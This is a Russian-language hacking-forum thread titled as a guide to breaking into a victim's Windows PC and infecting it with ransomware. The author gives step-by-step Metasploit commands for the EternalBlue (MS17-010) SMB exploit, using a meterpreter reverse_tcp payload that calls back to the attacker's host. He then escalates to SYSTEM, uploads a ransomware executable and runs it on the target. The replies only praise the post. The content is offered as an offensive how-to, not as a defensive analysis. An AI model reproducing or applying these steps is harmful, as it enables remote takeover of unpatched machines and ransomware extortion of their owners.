Загрузка...

Взламываем Windows PC жертвы и заражаем его вирусом-вымогателем

Тема в разделе Вирусология создана пользователем mrJollier 4 дек 2017. 997 просмотров

  1. mrJollier
    mrJollier Автор темы 4 дек 2017 Всё ещё живой 540 15 фев 2017
    Всем привет! Наверняка многие из вас слышали про EternalBlue - кодовое имя эксплойта, эксплуатирующего компьютерную уязвимость в Windows-реализации протокола SMB, к разработке которого, как считается, причастно Агентство национальной безопасности (США). Секретные сведения об уязвимости и исполняемый код эксплойта были опубликованы хакерской группой The Shadow Brokers 14 апреля 2017 года. Уязвимость была использована при распространении вредоносного ПО WannaCry в мае 2017 года. В этой статье я бы хотел обратить на него внимание, и попробовать в действии.

    [IMG]
    В последней версии Metasploit Framework присутствует, необходимый нам, для этого модуль.



    Этот модуль является портом эксплойта группы ETERNALBLUE, частью инструментария FuzzBunch, выпущенного Shadow Brokers. Существует операция переполнения буфера в Srv! SrvOs2FeaToNt. Размер вычисляется в Srv! SrvOs2FeaListSizeToNt, с математической ошибкой, когда DWORD вычитается в WORD. Пул ядра подготовлен так, чтобы переполнение было хорошо продуманно, чтобы перезаписать буфер SMBv1. Фактический захват RIP будет завершен позже в srvnet! SrvNetWskReceiveComplete. Этот эксплоит, как и оригинал, может не срабатывать с 100% шансом в течение определенного промежутка времени, и должен запускаться непрерывно до момента срабатывания.



    Приступим к осуществлению, в качестве атакующего хоста Kali Linux 2017.1, в качестве цели Windows 7.



    > msfupdate

    [IMG]
    > msfconsole



    > use exploit/windows/smb/ms17_010_eternalblue



    > msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.105



    > msf exploit(ms17_010_eternalblue) >set lhost 192.168.1.21



    > msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp



    > msf exploit(ms17_010_eternalblue) >exploit

    [IMG]
    Эксплоит срабатывает на отлично, получаем системные привилегии:



    > getsystem



    > getuid


    [IMG]
    Немного усугубим ситуацию, закинув целевому хосту вирус-вымогатель (аналог WannaCry). Его исходники есть в открытом доступе.

    [IMG]
    > upload /root/ransomware.exe C:\\



    > shell



    > cd C:\\



    > ransomware.exe

    [IMG]
    И как итог:

    [IMG]
    Вот собственно, и все. Спасибо за внимание.
     
  2. Darkhaese208060
  3. Darkhaese208060
    Годно
     
  4. fedorsorkin
    fedorsorkin 29 сен 2018 Лучше синица в руке, чем рука в синице 35 12 июн 2018
    класс, вспомнили об этой теме спустя год...
     
  5. Darkhaese208060
  6. Darkhaese208060
    Когда увидел тогда отметил
     
Загрузка...
Top